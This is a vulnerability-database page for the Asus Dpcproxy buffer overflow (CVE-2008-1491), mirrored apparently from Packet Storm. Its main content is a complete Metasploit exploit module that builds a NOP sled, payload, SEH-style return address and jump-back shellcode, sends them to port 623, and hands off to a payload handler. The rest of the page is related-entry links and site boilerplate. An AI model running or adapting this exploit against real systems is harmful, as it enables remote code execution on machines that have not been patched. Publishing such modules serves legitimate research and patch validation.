Lucene search
K

Asus Dpcproxy Buffer Overflow

🗓️ 26 Nov 2009 00:00:00Reported by Jacopo CerviniType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Asus Dpcproxy Buffer Overflow vulnerability in version 2.0.0.19 to 2.0.0.24

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-1491
29 May 200800:00
circl
CVE
CVE-2008-1491
25 Mar 200819:00
cve
Cvelist
CVE-2008-1491
25 Mar 200819:00
cvelist
Exploit DB
Asus Dpcproxy - Remote Buffer Overflow (Metasploit)
22 Jun 201000:00
exploitdb
Metasploit
Asus Dpcproxy Buffer Overflow
9 Jun 200805:13
metasploit
NVD
CVE-2008-1491
25 Mar 200819:44
nvd
Prion
Stack overflow
25 Mar 200819:44
prion
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Asus Dpcproxy Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in Asus Dpcroxy version 2.0.0.19.  
It should be vulnerable until version 2.0.0.24.  
Credit to Luigi Auriemma  
},  
'Author' => 'Jacopo Cervini',  
'Version' => '$Revision$',  
'References' =>   
[   
[ 'CVE', '2008-1491' ],  
[ 'OSVDB', '43638' ],  
[ 'BID', '28394' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 400,  
'BadChars' => "\x07\x08\x0d\x0e\x0f\x7e\x7f\xff",  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Asus Dpcroxy version 2.00.19 Universal', { 'Ret' => 0x0040273b } ], # p/p/r  
],  
'Privileged' => true,  
'DefaultTarget' => 0,  
'DisclosureDate' => 'March 21 2008'))  
  
register_options([Opt::RPORT(623)], self.class)  
  
end  
  
def exploit  
connect  
  
sploit = make_nops(0x38a - payload.encoded.length)+ payload.encoded + rand_text_english(6032)  
sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2)  
sploit << [target.ret].pack('V') + make_nops(8) + Metasm::Shellcode.assemble(Metasm::Ia32.new, "add bh,6 add bh,6 add bh,2 push ebx ret").encode_string #jmp back  
sploit << make_nops(50)  
  
print_status("Trying target #{target.name}...")  
sock.put(sploit)  
sleep(3) # =(  
  
handler  
disconnect  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Nov 2009 00:00Current
1.6Low risk
Vulners AI Score1.6
EPSS0.88716
25